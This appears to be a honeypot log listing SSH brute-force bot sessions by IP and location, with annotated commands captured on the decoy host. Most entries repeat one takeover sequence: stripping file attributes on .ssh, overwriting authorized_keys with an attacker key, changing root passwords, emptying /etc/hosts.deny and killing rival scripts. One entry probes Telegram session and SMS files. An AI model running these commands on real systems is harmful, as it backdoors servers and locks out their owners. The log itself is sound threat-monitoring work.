$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ubuntu\n8qdfYMxtWFGq\n8qdfYMxtWFGq"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu\n8qdfYMxtWFGq\n8qdfYMxtWFGq\n"|passwd
🎭 wraith_root_91 (146.59.32.16) β€” Warsaw, Poland Β· 1 session Β· 19 cmds
2026-05-16 06:35 EDT Β· as root/warnightkardesim
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cVfuzJ3HxrA3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_110 (154.209.4.195) β€” Chai Wan, Hong Kong Β· 1 session Β· 19 cmds
2026-05-16 06:31 EDT Β· as root/cocacola
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:SuYeoHd5P5nF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_111 (43.156.245.244) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-16 04:51 EDT Β· as root/1qaz=[;., root/p@ssw0rd!@#$
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:Q1vFK7fJjDZm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:4w6uaPvTVoPw"|chpasswd|bash
🎭 specter_root_95 (152.32.171.251) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-16 04:51 EDT Β· as root/1qaz=[;., root/p@ssw0rd!@#$
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:mgFOrSnRMgyQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:AV6svtPar2I2"|chpasswd|bash
🎭 gouda_sol_4 (45.156.87.69) β€” Eygelshoven, Netherlands Β· 3 sessions Β· 3 cmds
2026-05-16 04:03 EDT Β· as amin/amin, bot/root, codex/codex
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—3
🎭 tulip_sol (176.65.139.153) β€” Eygelshoven, The Netherlands Β· 3 sessions Β· 3 cmds
2026-05-16 03:46 EDT Β· as amin/amin, bot/root, codex/codex
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—3
🎭 windmill_sol (176.65.132.17) β€” Eygelshoven, The Netherlands Β· 3 sessions Β· 3 cmds
2026-05-04 09:55 EDT Β· as amin/amin, root/aa123456, root/tesTtest123a
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—3
🎭 clog_sol (45.153.34.114) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-15 23:36 EDT Β· as amin/amin, root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 wraith_root_92 (61.28.144.154) β€” Makati City, Philippines Β· 4 sessions Β· 78 cmds
2026-05-15 22:13 EDT Β· as dbus-helper/warnight, root/Push@8240, root/harley1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "warnight\nPaRb6AayyIYC\nPaRb6AayyIYC"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "warnight\nPaRb6AayyIYC\nPaRb6AayyIYC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "warnight\npw9bri0mnWXE\npw9bri0mnWXE"|passwd|bash
$ echo "warnight\npw9bri0mnWXE\npw9bri0mnWXE\n"|passwd
$ echo "root:wwfzInF008ib"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:34AChOThN5rb"|chpasswd|bash
🎭 cipher_root_92 (102.218.89.110) β€” Kampala, Uganda Β· 4 sessions Β· 78 cmds
2026-05-15 22:14 EDT Β· as dbus-helper/warnight, root/Push@8240, root/harley1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "warnight\n7RubMWBYZkW7\n7RubMWBYZkW7"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "warnight\n7RubMWBYZkW7\n7RubMWBYZkW7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "warnight\nrmMk5aEbLb9U\nrmMk5aEbLb9U"|passwd|bash
$ echo "warnight\nrmMk5aEbLb9U\nrmMk5aEbLb9U\n"|passwd
$ echo "root:EmGlTykax8EW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:N7t92NvQnK7c"|chpasswd|bash
🎭 lantern_root_36 (220.170.52.145) β€” Jianning, China Β· 1 session Β· 1 cmd
2026-05-15 22:41 EDT Β· as root/Test@2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 cipher_root_93 (211.76.92.34) β€” Taipei, Taiwan Β· 1 session Β· 9 cmds
2026-05-15 21:10 EDT Β· as root/root
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 hanbok_root_2 (39.123.249.114) β€” Gangnam-gu, South Korea Β· 2 sessions Β· 39 cmds
2026-05-05 01:44 EDT Β· as admin/laurent, root/123Qwe123C
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:3SAFSppJI83O"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "laurent\nBRWAV9KzDzsQ\nBRWAV9KzDzsQ"|passwd|bash
$ Enter new UNIX password:
$ echo "laurent\nBRWAV9KzDzsQ\nBRWAV9KzDzsQ\n"|passwd
🎭 cipher_root_94 (165.154.6.104) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-15 18:07 EDT Β· as webadmin/webadmin1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "webadmin1\nr47PMOopIm9L\nr47PMOopIm9L"|passwd|bash
$ Enter new UNIX password:
$ echo "webadmin1\nr47PMOopIm9L\nr47PMOopIm9L\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_93 (154.209.4.208) β€” Chai Wan, Hong Kong Β· 4 sessions Β· 79 cmds
2026-05-15 17:32 EDT Β· as dbus-helper/warnight, linux/linux123, root/nemesis
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:akIHH3oGGFlT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "warnight\nnyJV7CAYn1VJ\nnyJV7CAYn1VJ"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "warnight\nnyJV7CAYn1VJ\nnyJV7CAYn1VJ\n"|passwd
$ echo -e "linux123\nae8l1rvFw0HB\nae8l1rvFw0HB"|passwd|bash
$ echo "linux123\nae8l1rvFw0HB\nae8l1rvFw0HB\n"|passwd
$ echo -e "warnight\nwDmQ57V3VTlD\nwDmQ57V3VTlD"|passwd|bash
$ echo "warnight\nwDmQ57V3VTlD\nwDmQ57V3VTlD\n"|passwd
🎭 star_sol (52.177.169.196) β€” Boydton, United States Β· 3 sessions Β· 60 cmds
2026-05-15 17:49 EDT Β· as dbus-helper/warnight, linux/linux123, systemd-sync/warnight
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "warnight\nSg3HKEhOjEVx\nSg3HKEhOjEVx"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "warnight\nSg3HKEhOjEVx\nSg3HKEhOjEVx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "warnight\nTqMy3Qdye0ON\nTqMy3Qdye0ON"|passwd|bash
$ echo "warnight\nTqMy3Qdye0ON\nTqMy3Qdye0ON\n"|passwd
$ echo -e "linux123\nMpcsmEiJS7lE\nMpcsmEiJS7lE"|passwd|bash
$ echo "linux123\nMpcsmEiJS7lE\nMpcsmEiJS7lE\n"|passwd
🎭 moose_root_4 (138.197.164.175) β€” Toronto, Canada Β· 1 session Β· 19 cmds
2026-05-15 18:04 EDT Β· as root/123Qwe123C
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hKUXK1gRupzs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_20 (178.104.2.38) β€” Nuremberg, Germany Β· 4 sessions Β· 79 cmds
2026-05-15 17:29 EDT Β· as dbus-helper/warnight, linux/linux123, root/saffron
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
